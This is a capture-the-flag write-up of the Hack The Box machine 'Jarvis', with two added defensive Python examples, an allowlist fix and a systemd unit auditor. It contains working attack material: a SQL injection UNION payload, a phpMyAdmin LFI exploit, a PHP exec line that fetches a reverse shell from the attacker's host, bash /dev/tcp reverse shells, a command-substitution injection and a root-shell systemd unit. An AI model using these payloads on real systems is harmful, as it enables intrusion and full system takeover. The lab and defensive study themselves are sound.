Hack The Box: Jarvis Write-up (#20)

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.143
  • -sC: run the default Nmap scripts
  • -sV: service/version detection
  • -O: enable OS detection
  • -oA: write the results in all three output formats (normal, grepable and XML)
  • -p-: scan all ports from 1 to 65535
  • Port 22: SSH, OpenSSH 7.4p1 Debian 10+deb9u6
  • Port 80: HTTP, Apache httpd 2.4.25 (Debian)
  • Port 64999: HTTP, Apache httpd 2.4.25 (Debian)
Nmap scan report for ip-10-10-10-143.ap-southeast-1.compute.internal (10.10.10.143)
Host is up (0.016s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
64999/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
nmap -sU -O --top-ports=100 -oA nmap/udp-top100 10.10.10.143
  • -sU: UDP scan
Nmap scan report for ip-10-10-10-143.ap-southeast-1.compute.internal (10.10.10.143)
Host is up (0.010s latency).
All 100 scanned ports on ip-10-10-10-143.ap-southeast-1.compute.internal (10.10.10.143) are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 5 23:29:26 2020 -- 1 IP address (1 host up) scanned in 104.62 seconds
  1. Port 22: OpenSSH 7.4p1 has no widely known, easily exploitable vulnerabilities, so we don't spend time enumerating it further.
  2. Ports 80 and 64999 both run an Apache web service. Port 64999 is an unusual port for HTTP. One of these two web services should give us an initial foothold on the target, so we will check both. We will most likely also need to brute-force directories to look for sensitive files and for version information about the running web application.

Service Enumeration

Port 80 (HTTP Web Service)

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://supersecurehotel.htb:64999/ -x txt,php -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://supersecurehotel.htb:64999/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2020/09/06 07:59:04 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/09/06 08:01:54 Finished
===============================================================
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://supersecurehotel.htb/ -x txt,php -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.143/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2020/09/06 06:53:17 Starting gobuster
===============================================================
/images (Status: 301)
/index.php (Status: 200)
/nav.php (Status: 200)
/footer.php (Status: 200)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 301)
/connection.php (Status: 200)
/room.php (Status: 302)
/sass (Status: 301)
/server-status (Status: 403)
===============================================================
2020/09/06 06:56:40 Finished
===============================================================
union all select 1,host,user,password,5,6,7 from mysql.user

Exploitation

root@kali:/htb/Jarvis# searchsploit -m php/webapps/44928.txt
Exploit: phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)
URL: https://www.exploit-db.com/exploits/44928
Path: /usr/share/exploitdb/exploits/php/webapps/44928.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /htb/Jarvis/44928.txt
...
1. Run SQL Query : select '<?php phpinfo();exit;?>'
2. Include the session file :
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
http://supersecurehotel.htb/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_<PHPmyadmin session cookie>
cp /usr/share/webshells/php/php-reverse-shell.php .
select '<?php exec("wget -O /var/www/html/shell.php http://10.10.14.31/php-reverse-shell.php"); ?>'
root@kali:/htb/Jarvis# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
http://supersecurehotel.htb/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_<PHPmyadmin session cookie>
10.10.10.143 - - [08/Sep/2020 01:05:32] "GET /php-reverse-shell.php HTTP/1.1" 200 -
10.10.10.143 - - [08/Sep/2020 01:05:32] "GET /php-reverse-shell.php HTTP/1.1" 200 -
root@kali:/htb/Jarvis# nc -nlvp 53
listening on [any] 53 ...
http://supersecurehotel.htb/shell.php
9999 union select 1,2,(select '<?php exec(\"wget -O /var/www/html/shell.php http://10.10.14.31/php-reverse-shell.php\")),4,5,6,7 INTO OUTFILE '/var/www/html/test.php'
python -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo;fg
export TERM=xterm

Post-Exploitation Enumeration

www-data@jarvis:/$ find / -name user.txt -type f 2>/dev/null
/home/pepper/user.txt
www-data@jarvis:/$ ls -l /home/pepper/user.txt
-r--r----- 1 root pepper 33 Mar 5 2019 /home/pepper/user.txt
www-data@jarvis:/$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
...
def exec_ping():
    # Blocklist of shell metacharacters; '$', '(' and ')' are not on it,
    # so command substitution like $(...) passes straight through.
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

if __name__ == '__main__':
    show_header()
    if len(sys.argv) != 2:
        show_help()
        exit()
    ...
    elif sys.argv[1] == '-p':
        exec_ping()
        exit()
    else:
        show_help()
        exit()
www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
[simpler.py ASCII-art banner, @ironhackers.es]
***********************************************
Enter an IP: $(id)
ping: groups=1000(pepper): Temporary failure in name resolution
The shell expanded $(id) before ping ran, so the output of id (running as pepper) was handed to ping as its argument: the blocklist does not stop command substitution.
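The blocklist in simpler.py rejects a handful of shell metacharacters but not `$`, `(` or `)`, so command substitution reaches `os.system` untouched. The following is an added example, not code from the write-up or from the simpler.py utility: it reproduces the original check as a function and places an allowlist-based replacement beside it, which accepts only a parseable IP address and runs ping through `subprocess` without any shell. The function names (`blocklist_allows`, `is_safe_target`, `build_ping_argv`) are this example's own.

```python
"""Added example: the blocklist check from simpler.py beside an allowlist fix.
Not part of the original write-up or of the simpler.py utility."""
import ipaddress
import subprocess

# The blocklist exactly as simpler.py has it: '$', '(' and ')' are absent.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def blocklist_allows(user_input: str) -> bool:
    """Reproduces the original check: True when no forbidden substring is present."""
    return not any(token in user_input for token in FORBIDDEN)


def is_safe_target(user_input: str) -> bool:
    """Allowlist check: only a syntactically valid IPv4 or IPv6 address passes."""
    try:
        ipaddress.ip_address(user_input.strip())
    except ValueError:
        return False
    return True


def build_ping_argv(user_input: str) -> list:
    """Build the argv for ping. The target is its own argv element, so no shell
    ever interprets it; a validated IP address also cannot start with '-',
    so it cannot be mistaken for an option."""
    if not is_safe_target(user_input):
        raise ValueError(f"not an IP address: {user_input!r}")
    target = str(ipaddress.ip_address(user_input.strip()))
    return ["ping", "-c", "1", target]


def exec_ping(user_input: str) -> int:
    """Hardened counterpart of simpler.py's exec_ping(): runs ping without a shell."""
    return subprocess.run(build_ping_argv(user_input), check=False).returncode


if __name__ == "__main__":
    # Compare both checks on a valid address and on two injection attempts.
    for candidate in ["10.10.10.143", "$(id)", "127.0.0.1; id"]:
        print(f"{candidate!r}: blocklist allows={blocklist_allows(candidate)}, "
              f"allowlist allows={is_safe_target(candidate)}")
```

The point of the allowlist is that it describes what a valid input looks like instead of enumerating bad characters, and that the validated value is passed as a separate argv element rather than concatenated into a shell command line; either change alone would have been insufficient.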

#1 Privilege Escalation (www-data to pepper)

bash -i >& /dev/tcp/10.10.14.31/53 0>&1
nc -nlvp 53
$(bash /tmp/shell.php)

#2 Privilege Escalation (pepper to root)

pepper@jarvis:~$ cat root.service
[Unit]
Description=root shell
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.31/53 0>&1'
[Install]
WantedBy=multi-user.target
root@kali:/htb/Jarvis# nc -nlvp 53
listening on [any] 53 ...
systemctl enable /home/pepper/root.service
systemctl start root
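The unit file above is loaded from a home directory and runs as root with an ExecStart that connects a shell to the network. As an added example (not part of the write-up), the following audits a unit file for exactly those two properties: a source path outside systemd's standard unit directories, and an ExecStart running as root that matches common network-shell patterns. The root.service text is the one shown above; the benign comparison unit, the pattern list and the function names (`parse_unit`, `audit_unit`) are constructed for this example.

```python
"""Added example: audit a systemd unit file for the properties the root.service
above exhibits. Not part of the original write-up."""
import re

# Directories systemd normally loads units from; anything else is worth a look.
TRUSTED_UNIT_DIRS = (
    "/etc/systemd/system/",
    "/usr/lib/systemd/system/",
    "/lib/systemd/system/",
    "/run/systemd/system/",
)

# ExecStart fragments that indicate a shell wired to the network (constructed list).
SUSPICIOUS_EXEC = [
    re.compile(r"/dev/tcp/"),
    re.compile(r"\bbash\s+-i\b"),
    re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"),
    re.compile(r"\bsocat\b.*\bexec:"),
]


def parse_unit(text: str) -> dict:
    """Minimal unit-file parser: {section: {key: [values...]}} (keys may repeat)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def audit_unit(path: str, text: str) -> list:
    """Return findings for the unit file at `path` with contents `text`.
    `path` should be the resolved target of any symlink systemctl created."""
    findings = []
    if not path.startswith(TRUSTED_UNIT_DIRS):
        findings.append(f"unit loaded from outside the standard unit directories: {path}")
    service = parse_unit(text).get("Service", {})
    # A system unit without User= runs as root, so treat absence as root.
    user = service.get("User", ["root"])[0]
    for cmd in service.get("ExecStart", []):
        for pattern in SUSPICIOUS_EXEC:
            if pattern.search(cmd):
                findings.append(f"ExecStart (as {user}) matches {pattern.pattern!r}: {cmd}")
                break
    return findings


# Unit contents as shown in the write-up above.
ROOT_SERVICE = """\
[Unit]
Description=root shell
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.31/53 0>&1'
[Install]
WantedBy=multi-user.target
"""

# Constructed benign unit for comparison.
BENIGN_SERVICE = """\
[Unit]
Description=Example daemon
[Service]
Type=simple
User=daemon
ExecStart=/usr/bin/example-daemon --foreground
[Install]
WantedBy=multi-user.target
"""

if __name__ == "__main__":
    for path, text in [("/home/pepper/root.service", ROOT_SERVICE),
                       ("/etc/systemd/system/example.service", BENIGN_SERVICE)]:
        for finding in audit_unit(path, text) or ["no findings"]:
            print(f"{path}: {finding}")
```

`systemctl enable /absolute/path.service` links the file into /etc/systemd/system, so a sweep of a live host would iterate that directory, resolve each symlink with `os.path.realpath`, and pass the resolved path to `audit_unit`; a unit whose real file lives under /home or /tmp is the first thing that check surfaces.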

Attack Strategy Map

[Figure: attack strategy map (image not preserved in this extract)]

Joshua Surendran